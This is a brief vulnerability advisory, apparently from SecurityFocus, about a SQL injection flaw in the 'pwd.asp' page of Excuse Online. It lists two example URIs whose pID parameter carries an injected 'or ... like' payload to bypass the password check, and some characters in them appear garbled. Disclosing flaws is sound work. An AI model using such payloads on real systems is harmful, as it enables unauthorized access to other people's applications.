Excuse Online 'pwd.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+???+like+'%25
http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+??+like+'%25


 

Privacy Statement
Copyright 2010, SecurityFocus